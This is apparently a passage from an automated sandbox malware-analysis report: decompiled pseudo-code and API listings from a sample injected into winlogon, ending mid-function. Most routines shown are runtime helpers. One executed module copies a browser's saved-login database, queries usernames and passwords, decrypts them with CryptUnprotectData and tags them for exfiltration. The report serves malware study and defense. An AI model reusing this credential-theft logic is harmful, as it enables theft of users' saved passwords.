    							__eflags = _t185;
    						} else {
    							 *_t184 = _t86;
    							_t185 = _t184 + 1;
    							_t164 =  *_t172 | _t172[1] & 0x000fffff;
    							__eflags = _t164;
    							if(_t164 != 0) {
    								_v16 = 0x3fe;
    							} else {
    								_v16 = _v16 & _t164;
    							}
    						}
    						_t146 = _t185;
    						_t186 = _t185 + 1;
    						_v28 = _t146;
    						__eflags = _t181;
    						if(_t181 != 0) {
    							_t30 = _v48 + 0x88; // 0xffce8305
    							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
    						} else {
    							 *_t146 = 0;
    						}
    						_t92 = _t172[1] & 0x000fffff;
    						__eflags = _t92;
    						_v20 = _t92;
    						if(_t92 > 0) {
    							L23:
    							_t33 =  &_v8;
    							 *_t33 = _v8 & 0x00000000;
    							__eflags =  *_t33;
    							_t147 = 0xf0000;
    							_t93 = 0x30;
    							_v12 = _t93;
    							_v20 = 0xf0000;
    							do {
    								__eflags = _t181;
    								if(_t181 <= 0) {
    									break;
    								}
    								_t119 = E00D7D930( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
    								_t161 = 0x30;
    								_t121 = _t119 + _t161 & 0x0000ffff;
    								__eflags = _t121 - 0x39;
    								if(_t121 > 0x39) {
    									_t121 = _t121 + _t136;
    									__eflags = _t121;
    								}
    								_t162 = _v20;
    								_t172 = _a4;
    								 *_t186 = _t121;
    								_t186 = _t186 + 1;
    								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
    								_t147 = _t162 >> 4;
    								_t93 = _v12 - 4;
    								_t181 = _t181 - 1;
    								_v20 = _t162 >> 4;
    								_v12 = _t93;
    								__eflags = _t93;
    							} while (_t93 >= 0);
    							__eflags = _t93;
    							if(_t93 < 0) {
    								goto L39;
    							}
    							_t115 = E00D7D930( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
    							__eflags = _t115 - 8;
    							if(_t115 <= 8) {
    								goto L39;
    							}
    							_t116 = _t186 - 1;
    							_t138 = 0x30;
    							while(1) {
    								_t156 =  *_t116;
    								__eflags = _t156 - 0x66;
    								if(_t156 == 0x66) {
    									goto L33;
    								}
    								__eflags = _t156 - 0x46;
    								if(_t156 != 0x46) {
    									_t139 = _v32;
    									__eflags = _t116 - _v28;
    									if(_t116 == _v28) {
    										_t57 = _t116 - 1;
    										 *_t57 =  *(_t116 - 1) + 1;
    										__eflags =  *_t57;
    									} else {
    										_t157 =  *_t116;
    										__eflags = _t157 - 0x39;
    										if(_t157 != 0x39) {
    											 *_t116 = _t157 + 1;
    										} else {
    											 *_t116 = _t139 + 0x3a;
    										}
    									}
    									goto L39;
    								}
    								L33:
    								 *_t116 = _t138;
    								_t116 = _t116 - 1;
    							}
    						} else {
    							__eflags =  *_t172;
    							if( *_t172 <= 0) {
    								L39:
    								__eflags = _t181;
    								if(_t181 > 0) {
    									_push(_t181);
    									_t111 = 0x30;
    									_push(_t111);
    									_push(_t186);
    									E00D6D520(_t181);
    									_t186 = _t186 + _t181;
    									__eflags = _t186;
    								}
    								_t94 = _v28;
    								__eflags =  *_t94;
    								if( *_t94 == 0) {
    									_t186 = _t94;
    								}
    								__eflags = _a28;
    								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
    								_t174 = _a4[1];
    								_t100 = E00D7D930( *_a4, 0x34, _t174);
    								_t137 = 0;
    								_t151 = (_t100 & 0x000007ff) - _v16;
    								__eflags = _t151;
    								asm("sbb ebx, ebx");
    								if(__eflags < 0) {
    									L47:
    									 *(_t186 + 1) = 0x2d;
    									_t187 = _t186 + 2;
    									__eflags = _t187;
    									_t151 =  ~_t151;
    									asm("adc ebx, 0x0");
    									_t137 =  ~_t137;
    									goto L48;
    								} else {
    									if(__eflags > 0) {
    										L46:
    										 *(_t186 + 1) = 0x2b;
    										_t187 = _t186 + 2;
    										L48:
    										_t182 = _t187;
    										_t101 = 0x30;
    										 *_t187 = _t101;
    										__eflags = _t137;
    										if(__eflags < 0) {
    											L56:
    											__eflags = _t187 - _t182;
    											if(_t187 != _t182) {
    												L60:
    												_push(0);
    												_push(0xa);
    												_push(_t137);
    												_push(_t151);
    												_t102 = E00D7D7E0();
    												_v32 = _t174;
    												 *_t187 = _t102 + 0x30;
    												_t187 = _t187 + 1;
    												__eflags = _t187;
    												L61:
    												_t104 = 0x30;
    												_t183 = 0;
    												__eflags = 0;
    												 *_t187 = _t151 + _t104;
    												 *(_t187 + 1) = 0;
    												goto L62;
    											}
    											__eflags = _t137;
    											if(__eflags < 0) {
    												goto L61;
    											}
    											if(__eflags > 0) {
    												goto L60;
    											}
    											__eflags = _t151 - 0xa;
    											if(_t151 < 0xa) {
    												goto L61;
    											}
    											goto L60;
    										}
    										if(__eflags > 0) {
    											L51:
    											_push(0);
    											_push(0x3e8);
    											_push(_t137);
    											_push(_t151);
    											_t107 = E00D7D7E0();
    											_v32 = _t174;
    											 *_t187 = _t107 + 0x30;
    											_t187 = _t187 + 1;
    											__eflags = _t187 - _t182;
    											if(_t187 != _t182) {
    												L55:
    												_push(0);
    												_push(0x64);
    												_push(_t137);
    												_push(_t151);
    												_t109 = E00D7D7E0();
    												_v32 = _t174;
    												 *_t187 = _t109 + 0x30;
    												_t187 = _t187 + 1;
    												__eflags = _t187;
    												goto L56;
    											}
    											L52:
    											__eflags = _t137;
    											if(__eflags < 0) {
    												goto L56;
    											}
    											if(__eflags > 0) {
    												goto L55;
    											}
    											__eflags = _t151 - 0x64;
    											if(_t151 < 0x64) {
    												goto L56;
    											}
    											goto L55;
    										}
    										__eflags = _t151 - 0x3e8;
    										if(_t151 < 0x3e8) {
    											goto L52;
    										}
    										goto L51;
    									}
    									__eflags = _t151;
    									if(_t151 < 0) {
    										goto L47;
    									}
    									goto L46;
    								}
    							}
    							goto L23;
    						}
    					}
    					__eflags = 0;
    					if(0 != 0) {
    						goto L11;
    					} else {
    						_t183 = E00D743AC(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
    						__eflags = _t183;
    						if(_t183 == 0) {
    							_t128 = E00D7E060(_t184, 0x65);
    							_pop(_t166);
    							__eflags = _t128;
    							if(_t128 != 0) {
    								__eflags = _a28;
    								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
    								__eflags = _t170;
    								 *_t128 = _t170;
    								 *((char*)(_t128 + 3)) = 0;
    							}
    							_t183 = 0;
    						} else {
    							 *_t184 = 0;
    						}
    						goto L62;
    					}
    				} else {
    					_t129 = E00D72122();
    					_t183 = 0x22;
    					 *_t129 = _t183;
    					E00D70269();
    					L62:
    					if(_v40 != 0) {
    						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
    					}
    					return _t183;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D6B2F5() {
    				signed int _v8;
    				struct _FILETIME _v16;
    				signed int _v20;
    				union _LARGE_INTEGER _v24;
    				signed int _t21;
    				signed int _t29;
    				signed int _t32;
    				signed int _t36;
    
    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
    				_t21 =  *0xd88004; // 0x276b9783
    				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
    					GetSystemTimeAsFileTime( &_v16);
    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
    					_v8 = _v8 ^ GetCurrentThreadId();
    					_v8 = _v8 ^ GetCurrentProcessId();
    					QueryPerformanceCounter( &_v24);
    					_t29 =  &_v8;
    					_t36 = _v20 ^ _v24.LowPart ^ _v8 ^ _t29;
    					if(_t36 != 0xbb40e64e) {
    						if((0xffff0000 & _t36) == 0) {
    							_t29 = (_t36 | 0x00004711) << 0x10;
    							_t36 = _t36 | _t29;
    						}
    					} else {
    						_t36 = 0xbb40e64f;
    					}
    					 *0xd88004 = _t36;
    					 *0xd88000 =  !_t36;
    					return _t29;
    				} else {
    					_t32 =  !_t21;
    					 *0xd88000 = _t32;
    					return _t32;
    				}
    			}

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00D6B329
    • GetCurrentThreadId.KERNEL32 ref: 00D6B338
    • GetCurrentProcessId.KERNEL32 ref: 00D6B341
    • QueryPerformanceCounter.KERNEL32(?), ref: 00D6B34E
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 79%
    			E00D63B90(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v16;
    				signed int _v20;
    				char _v276;
    				char _v532;
    				void* _v536;
    				void* _v540;
    				intOrPtr _v544;
    				struct _CRITICAL_SECTION _v568;
    				intOrPtr _v572;
    				intOrPtr _v576;
    				char _v580;
    				void* __ebp;
    				signed int _t39;
    				signed int _t40;
    				void _t52;
    				void _t53;
    				void* _t56;
    				void* _t57;
    				void* _t58;
    				unsigned int _t59;
    				signed int _t60;
    				void* _t62;
    				signed int _t70;
    				intOrPtr _t71;
    				signed int _t83;
    				void _t88;
    				void _t89;
    				signed int _t91;
    				void* _t99;
    				signed int _t100;
    				char _t104;
    				void* _t106;
    				void* _t112;
    				void* _t118;
    				void* _t120;
    				void* _t121;
    				void* _t122;
    				signed int _t124;
    				void* _t125;
    				void* _t126;
    				void* _t127;
    				void* _t129;
    
    				_push(0xffffffff);
    				_push(E00D7E26B);
    				_push( *[fs:0x0]);
    				_t126 = _t125 - 0x234;
    				_t39 =  *0xd88004; // 0x276b9783
    				_t40 = _t39 ^ _t124;
    				_v20 = _t40;
    				_push(__ebx);
    				_push(__edi);
    				_push(_t40);
    				 *[fs:0x0] =  &_v16;
    				_t118 = __edx;
    				_v544 = __ecx;
    				if(__ecx != 0 && __edx != 0) {
    					_v580 = 0;
    					_v572 = 0;
    					_v576 = 0;
    					InitializeCriticalSection( &_v568);
    					_v8 = 0;
    					E00D636A0(__ebx,  &_v580, _t118, __edi, _t118);
    					_t104 = _v580;
    					_t70 = _v576 - _t104 >> 9;
    					if(_t70 == 0) {
    						L24:
    						_v576 = _t104;
    						DeleteCriticalSection( &_v568);
    						E00D68340(_t70,  &_v580, _t104);
    					} else {
    						_t120 = 0;
    						_v540 = 0;
    						if(_t70 != 0) {
    							_v536 = 0;
    							asm("o16 nop [eax+eax]");
    							do {
    								E00D6D520(_t104,  &_v532, 0, 0x200);
    								_t127 = _t126 + 0xc;
    								if(_t120 > 0xffffff || _t120 >= _t70) {
    									_t99 = 0;
    									goto L10;
    								} else {
    									if(_t70 <= _t120) {
    										L25:
    										E00D6B97B("invalid vector<T> subscript");
    										goto L26;
    									} else {
    										_t99 = _v536 + _t104;
    										L10:
    										_t121 = _t99;
    										do {
    											_t52 =  *_t99;
    											_t99 = _t99 + 1;
    										} while (_t52 != 0);
    										_t100 = _t99 - _t121;
    										_t106 =  &_v532 - 1;
    										do {
    											_t53 =  *(_t106 + 1);
    											_t106 = _t106 + 1;
    										} while (_t53 != 0);
    										_t83 = _t100 >> 2;
    										memcpy(_t106, _t121, _t83 << 2);
    										_t56 = memcpy(_t121 + _t83 + _t83, _t121, _t100 & 0x00000003);
    										_t129 = _t127 + 0x18;
    										if(_t56 > 0xffffff || _t56 >= _t70) {
    											_t71 = _v536;
    											_t57 = 0;
    											goto L19;
    										} else {
    											if(_t70 <= _t56) {
    												goto L25;
    											} else {
    												_t71 = _v536;
    												_t57 = _v580 + _t71;
    												L19:
    												_t58 = _t57 + 0x100;
    												_t122 = _t58;
    												do {
    													_t88 =  *_t58;
    													_t58 = _t58 + 1;
    												} while (_t88 != 0);
    												_t59 = _t58 - _t122;
    												_t112 =  &_v276 - 1;
    												do {
    													_t89 =  *(_t112 + 1);
    													_t112 = _t112 + 1;
    												} while (_t89 != 0);
    												goto L23;
    											}
    										}
    									}
    								}
    								goto L27;
    								L23:
    								_t91 = _t59 >> 2;
    								_t60 = memcpy(_t112, _t122, _t91 << 2);
    								_t94 = _t60 & 0x00000003;
    								_t62 = memcpy(_t122 + _t91 + _t91, _t122, _t60 & 0x00000003);
    								_t126 = _t129 + 0x18;
    								E00D62540(_t71, _v544, _t122 + (_t60 & 0x00000003) + _t94, _t62);
    								_t104 = _v580;
    								_t120 = _v540 + 1;
    								_v536 = _t71 + 0x200;
    								_v540 = _t120;
    								_t70 = _v576 - _t104 >> 9;
    							} while (_t120 < _t70);
    						}
    						goto L24;
    					}
    				}
    				L27:
    				 *[fs:0x0] = _v16;
    				return E00D6ABE4(_v20 ^ _t124);
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(?,276B9783), ref: 00D63BFD
      • Part of subcall function 00D636A0: __Stoull.NTSTC_LIBCMT ref: 00D63855
      • Part of subcall function 00D636A0: __Stoull.NTSTC_LIBCMT ref: 00D63872
    • DeleteCriticalSection.KERNEL32(?), ref: 00D63D5D
      • Part of subcall function 00D6B97B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D6B987
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    • invalid vector<T> subscript, xrefs: 00D63D75
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D6AB90(intOrPtr* __ecx, WCHAR* __edx) {
    
    				if(__ecx == 0 || __edx == 0) {
    					return 0;
    				} else {
    					wsprintfW(__edx, L"%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X",  *__ecx,  *(__ecx + 4) & 0x0000ffff,  *(__ecx + 6) & 0x0000ffff,  *(__ecx + 8) & 0x000000ff,  *(__ecx + 9) & 0x000000ff,  *(__ecx + 0xa) & 0x000000ff,  *(__ecx + 0xb) & 0x000000ff,  *(__ecx + 0xc) & 0x000000ff,  *(__ecx + 0xd) & 0x000000ff,  *(__ecx + 0xe) & 0x000000ff,  *(__ecx + 0xf) & 0x000000ff);
    					return 1;
    				}
    			}

    APIs
    Strings
    • %08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 00D6ABCC
    • =B?w, xrefs: 00D6ABD2
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D6E495(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
    				char* _v8;
    				int _v12;
    				char _v16;
    				char _v24;
    				char _v28;
    				void* __ebx;
    				char _t34;
    				int _t35;
    				int _t38;
    				long _t39;
    				char* _t42;
    				int _t44;
    				int _t47;
    				int _t53;
    				intOrPtr _t55;
    				void* _t56;
    				char* _t57;
    				char* _t62;
    				char* _t63;
    				void* _t64;
    				int _t65;
    				short* _t67;
    				short* _t68;
    				int _t69;
    				intOrPtr* _t70;
    
    				_t64 = __edx;
    				_t53 = _a12;
    				_t67 = _a4;
    				_t68 = 0;
    				if(_t67 == 0) {
    					L3:
    					if(_a8 != _t68) {
    						E00D6E412(_t53,  &_v28, _t64, _a16);
    						_t34 = _v24;
    						__eflags = _t67;
    						if(_t67 == 0) {
    							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
    							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
    								_t69 = _t68 | 0xffffffff;
    								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
    								__eflags = _t35;
    								if(_t35 != 0) {
    									L29:
    									_t28 = _t35 - 1; // -1
    									_t69 = _t28;
    									L30:
    									__eflags = _v16;
    									if(_v16 != 0) {
    										_t55 = _v28;
    										_t31 = _t55 + 0x350;
    										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
    										__eflags =  *_t31;
    									}
    									return _t69;
    								}
    								 *((intOrPtr*)(E00D72122())) = 0x2a;
    								goto L30;
    							}
    							_t70 = _a8;
    							_t25 = _t70 + 1; // 0x801
    							_t56 = _t25;
    							do {
    								_t38 =  *_t70;
    								_t70 = _t70 + 1;
    								__eflags = _t38;
    							} while (_t38 != 0);
    							_t69 = _t70 - _t56;
    							goto L30;
    						}
    						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
    						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
    							_t69 = _t68 | 0xffffffff;
    							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
    							__eflags = _t35;
    							if(_t35 != 0) {
    								goto L29;
    							}
    							_t39 = GetLastError();
    							__eflags = _t39 - 0x7a;
    							if(_t39 != 0x7a) {
    								L21:
    								 *((intOrPtr*)(E00D72122())) = 0x2a;
    								 *_t67 = 0;
    								goto L30;
    							}
    							_t42 = _a8;
    							_t57 = _t42;
    							_v8 = _t57;
    							_t65 = _t53;
    							__eflags = _t53;
    							if(_t53 == 0) {
    								L20:
    								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
    								__eflags = _t44;
    								if(_t44 != 0) {
    									_t69 = _t44;
    									goto L30;
    								}
    								goto L21;
    							} else {
    								goto L15;
    							}
    							while(1) {
    								L15:
    								_t45 =  *_t57;
    								_v12 = _t65 - 1;
    								__eflags =  *_t57;
    								if(__eflags == 0) {
    									break;
    								}
    								_t47 = E00D72793(__eflags, _t45 & 0x000000ff,  &_v24);
    								_t62 = _v8;
    								__eflags = _t47;
    								if(_t47 == 0) {
    									L18:
    									_t65 = _v12;
    									_t57 = _t62 + 1;
    									_v8 = _t57;
    									__eflags = _t65;
    									if(_t65 != 0) {
    										continue;
    									}
    									break;
    								}
    								_t62 = _t62 + 1;
    								__eflags =  *_t62;
    								if( *_t62 == 0) {
    									goto L21;
    								}
    								goto L18;
    							}
    							_t42 = _a8;
    							goto L20;
    						}
    						__eflags = _t53;
    						if(_t53 == 0) {
    							goto L30;
    						}
    						_t63 = _a8;
    						while(1) {
    							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
    							__eflags =  *(_t68 + _t63);
    							if( *(_t68 + _t63) == 0) {
    								goto L30;
    							}
    							_t68 =  &(_t68[0]);
    							_t67 =  &(_t67[1]);
    							__eflags = _t68 - _t53;
    							if(_t68 < _t53) {
    								continue;
    							}
    							goto L30;
    						}
    						goto L30;
    					}
    					 *((intOrPtr*)(E00D72122())) = 0x16;
    					return E00D70269() | 0xffffffff;
    				}
    				if(_t53 != 0) {
    					 *_t67 = 0;
    					goto L3;
    				}
    				return 0;
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000009,00000800,00000000,?,00000000,?,?,?,?,000003FF,?,00000000,00000800), ref: 00D6E52B
    • GetLastError.KERNEL32(?,?,?,000003FF,?,00000000,00000800), ref: 00D6E539
    • MultiByteToWideChar.KERNEL32(?,00000001,00000800,00000800,?,00000000,?,?,?,000003FF,?,00000000,00000800), ref: 00D6E594
    • MultiByteToWideChar.KERNEL32(?,00000009,00000800,00000000,00000000,00000000,?,?,?,?,000003FF,?,00000000,00000800), ref: 00D6E5DB
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 90%
    			E00D72BDD(char* _a4, short* _a8) {
    				int _v8;
    				void* __ecx;
    				void* __esi;
    				short* _t10;
    				short* _t14;
    				int _t15;
    				short* _t16;
    				void* _t26;
    				int _t27;
    				void* _t29;
    				short* _t35;
    				short* _t39;
    				short* _t40;
    
    				_push(_t29);
    				if(_a4 != 0) {
    					_t39 = _a8;
    					__eflags = _t39;
    					if(__eflags != 0) {
    						_push(_t26);
    						E00D74D4E(_t29, _t39, __eflags);
    						asm("sbb ebx, ebx");
    						_t35 = 0;
    						_t27 = _t26 + 1;
    						 *_t39 = 0;
    						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
    						_v8 = _t10;
    						__eflags = _t10;
    						if(_t10 != 0) {
    							_t40 = E00D717FF(_t29, _t10 + _t10);
    							__eflags = _t40;
    							if(_t40 != 0) {
    								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
    								__eflags = _t15;
    								if(_t15 != 0) {
    									_t16 = _t40;
    									_t40 = 0;
    									_t35 = 1;
    									__eflags = 1;
    									 *_a8 = _t16;
    								} else {
    									E00D720EC(GetLastError());
    								}
    							}
    							E00D717C5(_t40);
    							_t14 = _t35;
    						} else {
    							E00D720EC(GetLastError());
    							_t14 = 0;
    						}
    					} else {
    						 *((intOrPtr*)(E00D72122())) = 0x16;
    						E00D70269();
    						_t14 = 0;
    					}
    					return _t14;
    				}
    				 *((intOrPtr*)(E00D72122())) = 0x16;
    				E00D70269();
    				return 0;
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,?,?,?,?,?,00D6E755,00000000,00000000,?), ref: 00D72C38
    • GetLastError.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,?,?,?,?,?,00D6E755,00000000,00000000,?), ref: 00D72C45
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,?), ref: 00D72C6F
    • GetLastError.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,?), ref: 00D72C79
      • Part of subcall function 00D717C5: HeapFree.KERNEL32(00000000,00000000), ref: 00D717DB
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Executed Functions

    Control-flow Graph

    APIs
    • GetFileAttributesA.KERNELBASE ref: 10001D8C
    • GetTempPathA.KERNEL32(00000105,?), ref: 10001DD3
    • GetTempFileNameA.KERNEL32(?,chr,00000000,?), ref: 10001DED
    • CopyFileA.KERNEL32(?,?,00000000), ref: 10001DFB
    • CryptUnprotectData.CRYPT32(?), ref: 10001F00
    • HeapAlloc.KERNEL32(00000008,-00000064), ref: 10001F1E
    • LocalFree.KERNEL32(?,00000000,?,00000000), ref: 10001F38
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
      • Part of subcall function 10001000: lstrlenW.KERNEL32(10094C54), ref: 10001093
    • HeapFree.KERNEL32(00000000,00000000,?), ref: 10001F5E
    • DeleteFileA.KERNELBASE(?,?,?,?,?,?,?,?,00000000), ref: 10001F79
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    • chr, xrefs: 10001DE0
    • SELECT origin_url, username_value, password_value FROM logins;, xrefs: 10001E29
    • O~Du, xrefs: 10001F00
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Control-flow Graph

    C-Code - Quality: 71%
    			E013338C0() {
    				signed int _v8;
    				signed int _v16;
    				char _v17;
    				short _v19;
    				struct _OVERLAPPED* _v23;
    				char _v48;
    				char _v49;
    				short _v51;
    				struct _OVERLAPPED* _v55;
    				char _v64;
    				int _v68;
    				struct _OVERLAPPED* _v72;
    				intOrPtr _v76;
    				struct _OVERLAPPED* _v80;
    				long _v84;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t41;
    				short* _t43;
    				PWCHAR* _t46;
    				void* _t52;
    				void* _t55;
    				void* _t58;
    				void* _t60;
    				void _t63;
    				void* _t69;
    				WCHAR* _t70;
    				void* _t71;
    				signed int _t76;
    				void* _t83;
    				void* _t90;
    				void* _t91;
    				void* _t92;
    				void* _t94;
    				void* _t95;
    				void* _t97;
    				void* _t99;
    				void* _t100;
    				signed int _t101;
    				signed int _t103;
    
    				_t103 = (_t101 & 0xfffffff8) - 0x4c;
    				_t41 =  *0x1347004; // 0x262637d3
    				_v8 = _t41 ^ _t103;
    				_push(_t91);
    				_v68 = 0;
    				_t43 = GetCommandLineW();
    				if(_t43 == 0) {
    					L16:
    					_pop(_t92);
    					_pop(_t97);
    					_pop(_t69);
    					return E01333E82(_t69, _v8 ^ _t103, _t92, _t97);
    				} else {
    					_t46 = CommandLineToArgvW(_t43,  &_v68);
    					if(_v76 < 3) {
    						goto L16;
    					} else {
    						_t70 = _t46[2];
    						asm("xorps xmm0, xmm0");
    						_v64 = 0;
    						asm("movq [esp+0x25], xmm0");
    						_v55 = 0;
    						_v51 = 0;
    						_v49 = 0;
    						if(E013334E0(_t46[1],  &_v64) == 0) {
    							goto L16;
    						} else {
    							asm("xorps xmm0, xmm0");
    							_v48 = 0;
    							asm("movups [esp+0x35], xmm0");
    							_t76 = 0;
    							_v23 = 0;
    							asm("movq [esp+0x45], xmm0");
    							_v19 = 0;
    							_v17 = 0;
    							do {
    								 *((char*)(_t103 + _t76 + 0x34)) =  *((intOrPtr*)(_t103 + (_t76 & 0x0000000f) + 0x24));
    								_t76 = _t76 + 1;
    							} while (_t76 < 0x20);
    							_push(_t76);
    							_v84 = 0;
    							_v80 = 0;
    							_v72 = 0;
    							_v68 = 0;
    							_t52 = E01333790(_t76,  &_v84); // executed
    							_t103 = _t103 + 8;
    							if(_t52 == 0) {
    								goto L16;
    							} else {
    								_t98 = _v80;
    								_t77 = _v80;
    								if(E01333570(_v80,  &_v72) == 0) {
    									goto L16;
    								} else {
    									_t55 = E01331FB0( &_v84,  &_v72, _t91, _t98, _t98, _t77,  &_v48);
    									_t103 = _t103 + 0xc;
    									if(_t55 == 0 || E013335B0( &_v72) == 0) {
    										goto L16;
    									} else {
    										E013335E0(); // executed
    										_v84 = 0;
    										_t58 = E01333AB0( &_v84,  &_v72); // executed
    										if(_t58 == 0) {
    											goto L16;
    										} else {
    											_t94 =  !=  ? _v84 : L"<NULL>"; // executed
